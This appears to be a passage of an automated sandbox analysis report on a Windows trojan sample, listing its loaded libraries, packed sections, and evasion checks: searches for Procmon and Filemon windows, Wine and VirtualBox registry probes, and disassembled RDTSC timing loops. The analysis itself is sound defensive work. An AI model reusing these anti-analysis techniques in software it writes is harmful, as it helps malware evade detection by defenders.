              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006677BD0_2_006677BD
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 002B4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: hnbmjddz ZLIB complexity 0.9948681414219475
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_002D3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_002CCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\O9NEX20H.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1762304 > 1048576
              Source: file.exeStatic PE information: Raw size of hnbmjddz is bigger than: 0x100000 < 0x194600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hnbmjddz:EW;fhrijgtr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hnbmjddz:EW;fhrijgtr:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1bb4db should be: 0x1b0156
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: hnbmjddz
              Source: file.exeStatic PE information: section name: fhrijgtr
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068B040 push 1D41AA1Eh; mov dword ptr [esp], eax0_2_0068B29E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C885F push 6EE7CB76h; mov dword ptr [esp], edx0_2_006C88A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713046 push 3D525341h; mov dword ptr [esp], ebx0_2_0071308E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070B84B push 4E4005DEh; mov dword ptr [esp], eax0_2_0070B895
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D281D push ecx; mov dword ptr [esp], ebp0_2_005D282E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D281D push eax; mov dword ptr [esp], 362921ADh0_2_005D288A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D281D push ebx; mov dword ptr [esp], esi0_2_005D28A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D281D push 6F52A6B8h; mov dword ptr [esp], esi0_2_005D28F7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D281D push 2C64FB2Fh; mov dword ptr [esp], eax0_2_005D293C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D281D push 5F991B51h; mov dword ptr [esp], edi0_2_005D2981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00763839 push edi; mov dword ptr [esp], 02CDA24Dh0_2_00763B8A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E383C push 21DBAFA9h; mov dword ptr [esp], eax0_2_006E385B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A5036 push 0E2307F9h; mov dword ptr [esp], ebx0_2_006A507F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00746828 push 1CC0F124h; mov dword ptr [esp], eax0_2_0074685F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065801E push ebx; mov dword ptr [esp], 771B9D1Bh0_2_0065807D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073E0E1 push 2168C594h; mov dword ptr [esp], eax0_2_0073E12F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D7895 push ecx; ret 0_2_002D78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D78AD push 7A670F43h; mov dword ptr [esp], ebp0_2_006D78E1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D78AD push ecx; mov dword ptr [esp], edi0_2_006D78FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007200B4 push esi; mov dword ptr [esp], ecx0_2_007200C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078796E push eax; mov dword ptr [esp], 6E297539h0_2_0078799C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00691973 push ebp; mov dword ptr [esp], eax0_2_006919FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CE155 push 36B9AAAAh; mov dword ptr [esp], edx0_2_006CE1BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055510D push esi; mov dword ptr [esp], ebp0_2_005551BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055510D push 351B2574h; mov dword ptr [esp], eax0_2_0055522C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055510D push edx; mov dword ptr [esp], ebx0_2_0055524F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055510D push eax; mov dword ptr [esp], ecx0_2_005552FB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055510D push ebx; mov dword ptr [esp], ecx0_2_00555331
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E13A push 5A3DF4EEh; mov dword ptr [esp], edi0_2_0066E14C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E13A push 5D094971h; mov dword ptr [esp], ebp0_2_0066E1A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E13A push ebp; mov dword ptr [esp], 7E6D333Ch0_2_0066E1BF
              Source: file.exeStatic PE information: section name: hnbmjddz entropy: 7.954657445334715

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26007
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676413 second address: 676465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FF8A909BC16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 js 00007FF8A909BC2Ah 0x00000016 jmp 00007FF8A909BC1Eh 0x0000001b jne 00007FF8A909BC16h 0x00000021 jmp 00007FF8A909BC1Bh 0x00000026 popad 0x00000027 jc 00007FF8A909BC36h 0x0000002d jmp 00007FF8A909BC1Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 jc 00007FF8A909BC16h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6765D0 second address: 6765D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6765D6 second address: 6765DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B63 second address: 676B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B68 second address: 676B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B6E second address: 676B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B74 second address: 676B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6788CE second address: 6788EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6789AD second address: 6789DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF8A909BC24h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jl 00007FF8A909BC24h 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FF8A909BC16h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6789DB second address: 678A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 jo 00007FF8A95A6CBCh 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678A08 second address: 678A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Bh 0x00000009 popad 0x0000000a pop eax 0x0000000b mov edx, ecx 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF8A909BC18h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D398Eh] 0x0000002f push 00000000h 0x00000031 mov edi, esi 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FF8A909BC18h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f jmp 00007FF8A909BC1Bh 0x00000054 or si, CB73h 0x00000059 push CBC624F8h 0x0000005e push eax 0x0000005f push edx 0x00000060 ja 00007FF8A909BC1Ch 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678A93 second address: 678A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678A98 second address: 678AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF8A909BC16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 0BC624F8h 0x00000014 lea ebx, dword ptr [ebp+1244C6ACh] 0x0000001a mov dword ptr [ebp+122D35F6h], esi 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007FF8A909BC1Ah 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678B8B second address: 678B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678B90 second address: 678B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678C5E second address: 678C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69976D second address: 699771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663C5B second address: 663CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC7h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF8A95A6CC2h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c jbe 00007FF8A95A6CC2h 0x00000022 je 00007FF8A95A6CB6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663CA4 second address: 663CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663CA8 second address: 663CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69799E second address: 6979A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6979A2 second address: 6979AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697C22 second address: 697C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697F1D second address: 697F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FF8A95A6CBBh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF8A95A6CBFh 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698095 second address: 69809F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698375 second address: 698379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698379 second address: 6983CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC26h 0x00000007 jmp 00007FF8A909BC1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FF8A909BC1Ch 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007FF8A909BC24h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007FF8A909BC16h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6983CB second address: 6983CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEEE second address: 68CEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEF4 second address: 68CEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEFB second address: 68CF05 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8A909BC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698981 second address: 698985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698985 second address: 698999 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FF8A909BC1Ch 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698999 second address: 6989B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699633 second address: 699639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699639 second address: 69963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E9E3 second address: 69EA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF8A909BC16h 0x0000000a jo 00007FF8A909BC16h 0x00000010 popad 0x00000011 jmp 00007FF8A909BC1Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA00 second address: 69EA18 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8A95A6CC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA18 second address: 69EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A106D second address: 6A1075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A12CA second address: 6A12CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665815 second address: 665819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665819 second address: 665836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8A909BC27h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DAE second address: 6A4DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DB4 second address: 6A4DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DCC second address: 6A4DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DD2 second address: 6A4DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF8A909BC16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DDC second address: 6A4DEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50B4 second address: 6A50B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50B9 second address: 6A50D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007FF8A95A6CB6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007FF8A95A6CB8h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A520B second address: 6A5211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5211 second address: 6A521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A521C second address: 6A5220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A54FA second address: 6A5514 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF8A95A6CBCh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A57F1 second address: 6A57FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF8A909BC16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A57FD second address: 6A5801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5801 second address: 6A580B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8A909BC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7821 second address: 6A7827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7827 second address: 6A783E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF8A909BC1Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A783E second address: 6A7844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7ADC second address: 6A7AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
